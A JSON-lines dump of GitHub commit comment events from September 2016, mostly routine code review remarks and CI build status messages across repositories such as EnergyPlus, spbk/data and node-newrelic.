{"id":"4563661566","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19024155,"position":null,"line":null,"path":null,"commit_id":"4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf","created_at":"2016-09-14T18:14:15Z","updated_at":"2016-09-14T18:14:15Z","body":"versionNumbers (mitchute) - Win64-Windows-7-VisualStudio-12: OK (2334 of 2334 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T18:14:15Z"}
{"id":"4563662352","type":"CommitCommentEvent","actor":{"login":"tkrajcar"},"repo":{"name":"newrelic/node-newrelic"},"payload":{"comment":{"id":19024156,"position":null,"line":null,"path":null,"commit_id":"01486debd760628f7eb83a13c7a92a9ec5352fdd","created_at":"2016-09-14T18:14:23Z","updated_at":"2016-09-14T18:14:23Z","body":"@travi Thanks for the feedback, we'll definitely consider this info for our \"rollback\" playbook going forward."}},"created_at":"2016-09-14T18:14:23Z"}
{"id":"4563673398","type":"CommitCommentEvent","actor":{"login":"gunnarx"},"repo":{"name":"Pelagicore/genivi-dev-platform"},"payload":{"comment":{"id":19024189,"position":4,"line":7,"path":"gdp-src-build/conf/templates/minnowboard.bblayers.conf","commit_id":"87240e5800a01a0bcf3190faa11658524e6aa92f","created_at":"2016-09-14T18:16:27Z","updated_at":"2016-09-14T18:16:27Z","body":"Erik - great to see you started.\r\n\r\nFYI, if you are going to support other platforms later on, then new layers that are not BSP specific should be included from bblayers.inc - that way all hardware platforms get them\r\n"}},"created_at":"2016-09-14T18:16:27Z"}
{"id":"4563674140","type":"CommitCommentEvent","actor":{"login":"charlesLF"},"repo":{"name":"todiadiyatmo/fix-w3tc"},"payload":{"comment":{"id":19024192,"position":null,"line":null,"path":null,"commit_id":"132bd4c49841c31bed8ab300936232ad0b0b5fcc","created_at":"2016-09-14T18:16:35Z","updated_at":"2016-09-14T18:16:35Z","body":"Shouldn't this line:\r\n```php\r\n$this->_lifetime = apply_filters('w3tc_pgcache_lifetime', $this->_request_uri, $this->_lifetime);\r\n```\r\nbe changed to:\r\n```php\r\n$this->_lifetime = apply_filters('w3tc_pgcache_lifetime', $this->_lifetime, $this->_request_uri);\r\n```\r\n?"}},"created_at":"2016-09-14T18:16:35Z"}
{"id":"4563675031","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19024194,"position":null,"line":null,"path":null,"commit_id":"4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf","created_at":"2016-09-14T18:16:44Z","updated_at":"2016-09-14T18:16:44Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-14T18:16:44Z"}
{"id":"4563676170","type":"CommitCommentEvent","actor":{"login":"gunnarx"},"repo":{"name":"Pelagicore/genivi-dev-platform"},"payload":{"comment":{"id":19024196,"position":5,"line":8,"path":"gdp-src-build/conf/templates/minnowboard.bblayers.conf","commit_id":"87240e5800a01a0bcf3190faa11658524e6aa92f","created_at":"2016-09-14T18:16:57Z","updated_at":"2016-09-14T18:16:57Z","body":"But not this one, if it is intel specific of course."}},"created_at":"2016-09-14T18:16:57Z"}
{"id":"4563679088","type":"CommitCommentEvent","actor":{"login":"travi"},"repo":{"name":"newrelic/node-newrelic"},"payload":{"comment":{"id":19024206,"position":null,"line":null,"path":null,"commit_id":"01486debd760628f7eb83a13c7a92a9ec5352fdd","created_at":"2016-09-14T18:17:29Z","updated_at":"2016-09-14T18:17:29Z","body":"i really wish npm gave better guidance on this, particularly by making the registry fully immutable. updating dependencies happens so quickly with things like greenkeeper, that its just not a good idea to count on unpublishing fast enough that it doesnt impact consumers.\r\n\r\nthank you for being open to the feedback"}},"created_at":"2016-09-14T18:17:29Z"}
{"id":"4563681754","type":"CommitCommentEvent","actor":{"login":"ayushagarwal95"},"repo":{"name":"IEEECS-VIT/bulk-sms"},"payload":{"comment":{"id":19024218,"position":null,"line":null,"path":null,"commit_id":"d7c1b4a06c51c96dde9d72e0e029bc3e8f8f215d","created_at":"2016-09-14T18:17:58Z","updated_at":"2016-09-14T18:17:58Z","body":"@Vishwajeetsinh98, these files should be in the root directory itself and not inside a directory in the root directory."}},"created_at":"2016-09-14T18:17:58Z"}
{"id":"4563682312","type":"CommitCommentEvent","actor":{"login":"gunnarx"},"repo":{"name":"Pelagicore/genivi-dev-platform"},"payload":{"comment":{"id":19024220,"position":6,"line":17,"path":"gdp-src-build/conf/templates/minnowboard.local.conf","commit_id":"87240e5800a01a0bcf3190faa11658524e6aa92f","created_at":"2016-09-14T18:18:05Z","updated_at":"2016-09-14T18:18:05Z","body":"Similarly, there's a common file for local.conf also:  local.inc\r\n"}},"created_at":"2016-09-14T18:18:05Z"}
{"id":"4563683261","type":"CommitCommentEvent","actor":{"login":"lazd"},"repo":{"name":"james-braund-gw/nsdeclare"},"payload":{"comment":{"id":19024224,"position":4,"line":3,"path":"package.json","commit_id":"82a879ee1204c5b845e8337cab5265ca0675f55f","created_at":"2016-09-14T18:18:17Z","updated_at":"2016-09-14T18:18:17Z","body":"This would be a minor version bump since it's a new feature, but I'll handle that when we release!"}},"created_at":"2016-09-14T18:18:17Z"}
{"id":"4563686089","type":"CommitCommentEvent","actor":{"login":"lazd"},"repo":{"name":"james-braund-gw/nsdeclare"},"payload":{"comment":{"id":19024230,"position":null,"line":null,"path":null,"commit_id":"82a879ee1204c5b845e8337cab5265ca0675f55f","created_at":"2016-09-14T18:18:47Z","updated_at":"2016-09-14T18:18:47Z","body":"This is looking good! Please add some documentation and send along the PR and let's get this in!"}},"created_at":"2016-09-14T18:18:47Z"}
{"id":"4563692538","type":"CommitCommentEvent","actor":{"login":"maxbeatty"},"repo":{"name":"spbk/data"},"payload":{"comment":{"id":19024244,"position":2,"line":1,"path":"Procfile","commit_id":"563b23daa16b7780a9e547be2d09f1cc9a7e86d6","created_at":"2016-09-14T18:20:01Z","updated_at":"2016-09-14T18:20:01Z","body":"can the worker execute `npm start`? that would de-dupe the command from `package.json`"}},"created_at":"2016-09-14T18:20:01Z"}
{"id":"4563694575","type":"CommitCommentEvent","actor":{"login":"maxbeatty"},"repo":{"name":"spbk/data"},"payload":{"comment":{"id":19024253,"position":15,"line":34,"path":"package.json","commit_id":"563b23daa16b7780a9e547be2d09f1cc9a7e86d6","created_at":"2016-09-14T18:20:26Z","updated_at":"2016-09-14T18:20:26Z","body":"what's the motivation behind using strict mode?"}},"created_at":"2016-09-14T18:20:26Z"}
{"id":"4563698724","type":"CommitCommentEvent","actor":{"login":"robmadden"},"repo":{"name":"spbk/data"},"payload":{"comment":{"id":19024264,"position":2,"line":1,"path":"Procfile","commit_id":"563b23daa16b7780a9e547be2d09f1cc9a7e86d6","created_at":"2016-09-14T18:21:14Z","updated_at":"2016-09-14T18:21:14Z","body":"I'm honestly confused by the difference between the Procfile and package.json. They seem redundant to me. I had to play with these two settings in order to get Heroku to play nicely."}},"created_at":"2016-09-14T18:21:14Z"}
{"id":"4563700197","type":"CommitCommentEvent","actor":{"login":"ewized"},"repo":{"name":"ewized/PocketMine-MP"},"payload":{"comment":{"id":19024268,"position":5,"line":27,"path":"start.sh","commit_id":"9b84d8c2482b48ae007f8512b928e6b060c86847","created_at":"2016-09-14T18:21:29Z","updated_at":"2016-09-14T18:21:29Z","body":"This does not work for my system but `( type -p php > /dev/null )` does, using Ubuntu 16.04"}},"created_at":"2016-09-14T18:21:29Z"}
{"id":"4563704012","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"SedarG/corefx"},"payload":{"comment":{"id":19024280,"position":null,"line":null,"path":null,"commit_id":"0f76888c5f0ab22dbbdac5fb5f51524451981bdb","created_at":"2016-09-14T18:22:11Z","updated_at":"2016-09-14T18:22:11Z","body":"Here's the prototype. https://github.com/ericstj/corefx/commit/ad786a405eb74fd773946c6c83de40309f78f655"}},"created_at":"2016-09-14T18:22:11Z"}
{"id":"4563705906","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19024284,"position":null,"line":null,"path":null,"commit_id":"741620ecf23b3b6db2da6c61615b20965c087e58","created_at":"2016-09-14T18:22:30Z","updated_at":"2016-09-14T18:22:30Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 31](http://teamcity.otenv.com/viewLog.html?buildId=5211873&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T18:22:30Z"}
{"id":"4563707481","type":"CommitCommentEvent","actor":{"login":"anuko"},"repo":{"name":"anuko/timetracker"},"payload":{"comment":{"id":19024295,"position":null,"line":null,"path":null,"commit_id":"5aa92645bf876259fa327cf89a23df1f7034b1e3","created_at":"2016-09-14T18:22:48Z","updated_at":"2016-09-14T18:22:48Z","body":"I think PHP_EOL looks like a good thing to use if we want to be cross platform."}},"created_at":"2016-09-14T18:22:48Z"}
{"id":"4563708218","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19024297,"position":null,"line":null,"path":null,"commit_id":"7117abf5af13c25d679497cf21a7995035ec713c","created_at":"2016-09-14T18:22:56Z","updated_at":"2016-09-14T18:22:56Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7117abf5af13c25d679497cf21a7995035ec713c-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7117abf5af13c25d679497cf21a7995035ec713c-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T18:22:56Z"}
{"id":"4563709437","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"workflow4metabolomics/w4m-vm"},"payload":{"comment":{"id":19024301,"position":null,"line":null,"path":null,"commit_id":"91aa20b38beb48a41f76f5bf868ed703f6da36f0","created_at":"2016-09-14T18:23:10Z","updated_at":"2016-09-14T18:23:10Z","body":":+1: :)"}},"created_at":"2016-09-14T18:23:10Z"}
{"id":"4563710377","type":"CommitCommentEvent","actor":{"login":"maxbeatty"},"repo":{"name":"spbk/data"},"payload":{"comment":{"id":19024306,"position":1,"line":1,"path":".eslintrc.json","commit_id":"563b23daa16b7780a9e547be2d09f1cc9a7e86d6","created_at":"2016-09-14T18:23:21Z","updated_at":"2016-09-14T18:23:21Z","body":"I'd like to stick with just `.eslintrc` with the default airbnb config so it's easy to duplicate across projects. There's a lot of community support and discussion behind their reasonings that I'm comfortable trusting in.\r\n\r\nthat warning about require-extension should resolve itself once some upstream dependencies get fixed. good to ignore for now. I'm planning on adding https://greenkeeper.io/ once we have a few more repos that'll alert us of updates (and submit PRs with the changes)"}},"created_at":"2016-09-14T18:23:21Z"}
{"id":"4563712224","type":"CommitCommentEvent","actor":{"login":"ronaldddilley"},"repo":{"name":"USGS-EROS/espa-surface-reflectance"},"payload":{"comment":{"id":19024311,"position":null,"line":null,"path":null,"commit_id":"25024fd34457173e610268588d30480d3f59b364","created_at":"2016-09-14T18:23:42Z","updated_at":"2016-09-14T18:23:42Z","body":"Changes look good"}},"created_at":"2016-09-14T18:23:42Z"}
{"id":"4563714124","type":"CommitCommentEvent","actor":{"login":"ilexp"},"repo":{"name":"AdamsLair/duality"},"payload":{"comment":{"id":19024321,"position":4,"line":30,"path":"DualityPlugins/Tilemaps/Tilemaps/Components/ICmpTilemapRenderer.cs","commit_id":"6b76e81d45b94ae554312a83638df00d9de24405","created_at":"2016-09-14T18:24:05Z","updated_at":"2016-09-14T18:24:05Z","body":"Code Review Comment Test"}},"created_at":"2016-09-14T18:24:05Z"}
{"id":"4563715640","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19024328,"position":null,"line":null,"path":null,"commit_id":"e7c57e5de4dd9fd9ca7c028d82fc46ad5a834fdb","created_at":"2016-09-14T18:24:23Z","updated_at":"2016-09-14T18:24:23Z","body":"No, all you had to do is modify shorten in such a way that if it sees an identifier that begins with an \"ex\", you shorten it to \"x\"."}},"created_at":"2016-09-14T18:24:23Z"}
{"id":"4563716383","type":"CommitCommentEvent","actor":{"login":"martinwiboe"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19024333,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T18:24:30Z","updated_at":"2016-09-14T18:24:30Z","body":"@grendello Yes, the point is exactly it cannot be done and that the Handler should make _no effort at all_ to escape urls. That is the message I was trying to convey. I still think it's wrong to go with a half-broken escape effort using UriBuilder, but you're the maintainer."}},"created_at":"2016-09-14T18:24:30Z"}
{"id":"4563721419","type":"CommitCommentEvent","actor":{"login":"robmadden"},"repo":{"name":"spbk/data"},"payload":{"comment":{"id":19024351,"position":15,"line":34,"path":"package.json","commit_id":"563b23daa16b7780a9e547be2d09f1cc9a7e86d6","created_at":"2016-09-14T18:25:29Z","updated_at":"2016-09-14T18:25:29Z","body":"When I run the server locally using Node, I get the following error:\r\n\r\n```\r\nrobmadden at Blocs-MacBook-Pro-2 in ~/spaceback/data on master\r\n± node main.js                 \r\n/Users/robmadden/spaceback/data/scripts/characters.js:15\r\nlet characters = null;\r\n^^^\r\n\r\nSyntaxError: Block-scoped declarations (let, const, function, class) not yet supported outside strict mode\r\n    at exports.runInThisContext (vm.js:53:16)\r\n    at Module._compile (module.js:387:25)\r\n    at Object.Module._extensions..js (module.js:422:10)\r\n    at Module.load (module.js:357:32)\r\n    at Function.Module._load (module.js:314:12)\r\n    at Module.require (module.js:367:17)\r\n    at require (internal/module.js:16:19)\r\n    at Object.<anonymous> (/Users/robmadden/spaceback/data/main.js:14:1)\r\n    at Module._compile (module.js:413:34)\r\n    at Object.Module._extensions..js (module.js:422:10)\r\n\r\n```\r\n\r\nBut, if I add 'use strict;' to main.js or characters.js then ESLint complains, see [this thread](https://github.com/eslint/eslint/issues/5301):\r\n\r\n```\r\n± eslint main.js \r\n\r\n/Users/robmadden/spaceback/data/main.js\r\n  1:1  error  'use strict' is unnecessary inside of modules  strict\r\n\r\n✖ 1 problem (1 error, 0 warnings)\r\n```\r\n\r\nI didn't test whether --use_strict is necessary on Heroku."}},"created_at":"2016-09-14T18:25:29Z"}
{"id":"4563721468","type":"CommitCommentEvent","actor":{"login":"maxbeatty"},"repo":{"name":"spbk/data"},"payload":{"comment":{"id":19024352,"position":2,"line":1,"path":"Procfile","commit_id":"563b23daa16b7780a9e547be2d09f1cc9a7e86d6","created_at":"2016-09-14T18:25:29Z","updated_at":"2016-09-14T18:25:29Z","body":"`Procfile` is Heroku specific. `package.json` is npm specific. We'll lean on `package.json` heavily as we move around cloud providers so the more we can nicely fit in `scripts` the better"}},"created_at":"2016-09-14T18:25:29Z"}
{"id":"4563721486","type":"CommitCommentEvent","actor":{"login":"Adevade"},"repo":{"name":"anuko/timetracker"},"payload":{"comment":{"id":19024353,"position":null,"line":null,"path":null,"commit_id":"5aa92645bf876259fa327cf89a23df1f7034b1e3","created_at":"2016-09-14T18:25:29Z","updated_at":"2016-09-14T18:25:29Z","body":"Great! I went ahead and submitted a PR (#13) anyway, as it seemed like the best solution. \r\n\r\nThank you for the fast response, and for all your hard work on the Time Tracker! Will be trying to contribute as much as I can. "}},"created_at":"2016-09-14T18:25:29Z"}
{"id":"4563725045","type":"CommitCommentEvent","actor":{"login":"robmadden"},"repo":{"name":"spbk/data"},"payload":{"comment":{"id":19024361,"position":2,"line":1,"path":"Procfile","commit_id":"563b23daa16b7780a9e547be2d09f1cc9a7e86d6","created_at":"2016-09-14T18:26:08Z","updated_at":"2016-09-14T18:26:08Z","body":"Right, I'll try to get Heroku to play nicely with `package.json`, then."}},"created_at":"2016-09-14T18:26:08Z"}
{"id":"4563728240","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19024371,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-14T18:26:40Z","updated_at":"2016-09-14T18:26:40Z","body":"the joystick instance in DEV_Joystick::m_instance are not following the indices ? I don't really understand why you need an indices array if you iterate on all joysticks."}},"created_at":"2016-09-14T18:26:40Z"}
{"id":"4563730859","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19024381,"position":null,"line":null,"path":null,"commit_id":"d9999000fcad8ad44acc5c068b80c007e550934d","created_at":"2016-09-14T18:27:10Z","updated_at":"2016-09-14T18:27:10Z","body":"makingPrettyTransition (mitchute) - x86_64-MacOS-10.9-clang: OK (2322 of 2329 tests passed, 24 test warnings)\n\n * 10 tests had: AUD diffs.\n * 31 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n * 21 tests had: EIO diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d9999000fcad8ad44acc5c068b80c007e550934d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d9999000fcad8ad44acc5c068b80c007e550934d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T18:27:10Z"}
{"id":"4563736244","type":"CommitCommentEvent","actor":{"login":"riknoll"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":19024396,"position":114,"line":5084,"path":"src/services/services.ts","commit_id":"4a37fd7bcfa3a10020337dd032fef81dda625bac","created_at":"2016-09-14T18:28:05Z","updated_at":"2016-09-14T18:28:05Z","body":"Looking through `types.ts`, I think it's possible to have a variable declaration that is not within a variable statement. I'll add an assert for the `VariableDeclarationList` check, though, because that will always be the same if `node.parent.parent` is a `VariableStatement`."}},"created_at":"2016-09-14T18:28:05Z"}
{"id":"4563742030","type":"CommitCommentEvent","actor":{"login":"LalitPatil"},"repo":{"name":"anunayasri/react-stack"},"payload":{"comment":{"id":19024411,"position":null,"line":null,"path":null,"commit_id":"abedb75c00970f897093275547094af065eff700","created_at":"2016-09-14T18:29:07Z","updated_at":"2016-09-14T18:29:07Z","body":"You are tagging wrong people please correct your self "}},"created_at":"2016-09-14T18:29:07Z"}
{"id":"4563743330","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19024415,"position":null,"line":null,"path":null,"commit_id":"741620ecf23b3b6db2da6c61615b20965c087e58","created_at":"2016-09-14T18:29:21Z","updated_at":"2016-09-14T18:29:21Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 31](http://teamcity.otenv.com/viewLog.html?buildId=5211873&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:06:51"}},"created_at":"2016-09-14T18:29:21Z"}
{"id":"4563751360","type":"CommitCommentEvent","actor":{"login":"Etiene"},"repo":{"name":"CriztianiX/sailor"},"payload":{"comment":{"id":19024435,"position":null,"line":null,"path":null,"commit_id":"944fba4c7e0dea08c5125cc50b5a95588d29bb3c","created_at":"2016-09-14T18:30:49Z","updated_at":"2016-09-14T18:30:49Z","body":"When is the connection closed? "}},"created_at":"2016-09-14T18:30:49Z"}
{"id":"4563753556","type":"CommitCommentEvent","actor":{"login":"shi11"},"repo":{"name":"timflapper/cordova-spotify-plugin"},"payload":{"comment":{"id":19024441,"position":null,"line":null,"path":null,"commit_id":"1f21785e920aa82fb53c7e2b000f6a7dc72c68b9","created_at":"2016-09-14T18:31:13Z","updated_at":"2016-09-14T18:31:13Z","body":"this also worked for me. It'd be great it you merged it with master so that I won't have to maintain this change seperately ;)"}},"created_at":"2016-09-14T18:31:13Z"}
{"id":"4563755410","type":"CommitCommentEvent","actor":{"login":"a0c"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19024446,"position":null,"line":null,"path":null,"commit_id":"3e4206b4d45061d051ac778bc680c82ea6a9149a","created_at":"2016-09-14T18:31:32Z","updated_at":"2016-09-14T18:31:32Z","body":"Another point is in the [PayPal Payment Standard](https://developer.paypal.com/docs/classic/paypal-payments-standard/integration-guide/Appx_websitestandard_htmlvariables/).\r\nOdoo does not set the `rm` variable in paypal form, which makes it hold the default value 0:\r\n\r\n>  \tReturn method. The FORM METHOD used to send data to the URL specified by the return variable.\r\n> \r\n> Allowable values are:\r\n> \r\n>     0 — all shopping cart payments use the GET method\r\n>     1 — the buyer's browser is redirected to the return URL by using the GET method, but no payment variables are included\r\n>     2 — the buyer's browser is redirected to the return URL by using the POST method, and all payment variables are included\r\n> \r\n> The default is 0. \r\n"}},"created_at":"2016-09-14T18:31:32Z"}
{"id":"4563760047","type":"CommitCommentEvent","actor":{"login":"robmadden"},"repo":{"name":"spbk/data"},"payload":{"comment":{"id":19024456,"position":1,"line":1,"path":".eslintrc.json","commit_id":"563b23daa16b7780a9e547be2d09f1cc9a7e86d6","created_at":"2016-09-14T18:32:22Z","updated_at":"2016-09-14T18:32:22Z","body":"👍 \r\n"}},"created_at":"2016-09-14T18:32:22Z"}
{"id":"4563761843","type":"CommitCommentEvent","actor":{"login":"mitchute"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19024464,"position":5,"line":16,"path":"datasets/ASHRAE_2005_HOF_Materials.idf","commit_id":"d9999000fcad8ad44acc5c068b80c007e550934d","created_at":"2016-09-14T18:32:41Z","updated_at":"2016-09-14T18:32:41Z","body":"@mjwitte @Myoldmopar Suggestions on this line in the datasets? Instead of updating to V8.6, do we add the ```Version,8.6;``` identifier that gets updated with the change_version script?"}},"created_at":"2016-09-14T18:32:41Z"}
{"id":"4563766616","type":"CommitCommentEvent","actor":{"login":"UKozy"},"repo":{"name":"newrelic/node-newrelic"},"payload":{"comment":{"id":19024478,"position":null,"line":null,"path":null,"commit_id":"01486debd760628f7eb83a13c7a92a9ec5352fdd","created_at":"2016-09-14T18:33:34Z","updated_at":"2016-09-14T18:33:34Z","body":"+1 here for suggesting >publish a new patch version that is a revert of the last version"}},"created_at":"2016-09-14T18:33:34Z"}
{"id":"4563767976","type":"CommitCommentEvent","actor":{"login":"christopherthielen"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19024481,"position":17,"line":86,"path":"src/ng2/providers.ts","commit_id":"8ecb6c68353ac833db02c2a970be124a233f5f60","created_at":"2016-09-14T18:33:48Z","updated_at":"2016-09-14T18:33:48Z","body":"This is how I supported ng1-to-ng2 previously @adharris"}},"created_at":"2016-09-14T18:33:48Z"}
{"id":"4563769010","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"edzer/units"},"payload":{"comment":{"id":19024484,"position":4,"line":24,"path":"NAMESPACE","commit_id":"69bc1e7eeaac4a7fdc223b34d59035a7ad7e1346","created_at":"2016-09-14T18:33:58Z","updated_at":"2016-09-14T18:33:58Z","body":"Can't seem to get S3 dispatch to work:\r\n\r\n```r\r\n> hms::as.hms(units::as.units(1, units::make_unit(\"min\")))\r\nError: Can't convert object of class units to hms.\r\n4: traceback(1)\r\n3: stop(\"Can't convert object of class \", paste(class(x), collapse = \", \"), \r\n       \" to hms.\", call. = FALSE) at hms.R#81\r\n2: as.hms.default(units::as.units(1, units::make_unit(\"min\"))) at hms.R#76\r\n1: hms::as.hms(units::as.units(1, units::make_unit(\"min\")))\r\n> units::as.hms.units(units::as.units(1, units::make_unit(\"min\")))\r\n00:01:00\r\n```"}},"created_at":"2016-09-14T18:33:58Z"}
{"id":"4563772336","type":"CommitCommentEvent","actor":{"login":"gdbates1417"},"repo":{"name":"gdbates1417/github-pracitce-head"},"payload":{"comment":{"id":19024488,"position":null,"line":null,"path":null,"commit_id":"d653b7af8a2c53ef6db9022d2c3a41ea6f5e76ab","created_at":"2016-09-14T18:34:34Z","updated_at":"2016-09-14T18:34:34Z","body":"Look - a comment on a commit!"}},"created_at":"2016-09-14T18:34:34Z"}
{"id":"4563772540","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19024490,"position":null,"line":null,"path":null,"commit_id":"8e724c9faeb20dff617a817b06d697d16ce89bfa","created_at":"2016-09-14T18:34:37Z","updated_at":"2016-09-14T18:34:37Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-wordpress](https://slashzerop-static-docs.pantheonsite.io/docs/migrate-wordpress)\n"}},"created_at":"2016-09-14T18:34:37Z"}
{"id":"4563773364","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19024494,"position":null,"line":null,"path":null,"commit_id":"df499fc6e157403bd5493218dd7d81067e1e1418","created_at":"2016-09-14T18:34:46Z","updated_at":"2016-09-14T18:34:46Z","body":"Cross compiling for qt5 generally does not yet work.\r\nYou may add nocross=yes, or let the error die out.\r\n"}},"created_at":"2016-09-14T18:34:46Z"}
{"id":"4563779445","type":"CommitCommentEvent","actor":{"login":"glebm"},"repo":{"name":"thredded/thredded"},"payload":{"comment":{"id":19024505,"position":null,"line":null,"path":null,"commit_id":"16b9e088cb540c5374b102a03ecee66c1fb73d67","created_at":"2016-09-14T18:35:51Z","updated_at":"2016-09-14T18:35:51Z","body":"@timdiggins Yeah, let's replace `unless ENV['TRAVIS']` with something like `unless ENV['LOG_SQL_TO_STDOUT']`"}},"created_at":"2016-09-14T18:35:51Z"}
{"id":"4563780325","type":"CommitCommentEvent","actor":{"login":"mjwitte"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19024511,"position":5,"line":16,"path":"datasets/ASHRAE_2005_HOF_Materials.idf","commit_id":"d9999000fcad8ad44acc5c068b80c007e550934d","created_at":"2016-09-14T18:36:01Z","updated_at":"2016-09-14T18:36:01Z","body":"Once upon a time, there was a reason for not having an explicit version object in the dataset files, but I don't recall why or if it's still relevant. Perhpas the history of when that line was added will point to a PR that has some notes."}},"created_at":"2016-09-14T18:36:01Z"}
{"id":"4563782733","type":"CommitCommentEvent","actor":{"login":"femnad"},"repo":{"name":"femnad/tbd"},"payload":{"comment":{"id":19024517,"position":95,"line":74,"path":"parser.erl","commit_id":"759e1117b046c6f7f6d099165400d429b93064c5","created_at":"2016-09-14T18:36:24Z","updated_at":"2016-09-14T18:36:24Z","body":"What if the `get_binary` function took a `frame` record as argument?"}},"created_at":"2016-09-14T18:36:24Z"}
{"id":"4563785788","type":"CommitCommentEvent","actor":{"login":"hadley"},"repo":{"name":"hadley/r-internals"},"payload":{"comment":{"id":19024524,"position":32,"line":29,"path":"pairlists.md","commit_id":"57e1097a8c77e5e45dab9ccbd07f5ac71cf4d029","created_at":"2016-09-14T18:36:56Z","updated_at":"2016-09-14T18:36:56Z","body":"`SEXP s` should be `SEXP x` I guess, and `nxt` should be `cons`.  I really should test that code"}},"created_at":"2016-09-14T18:36:56Z"}
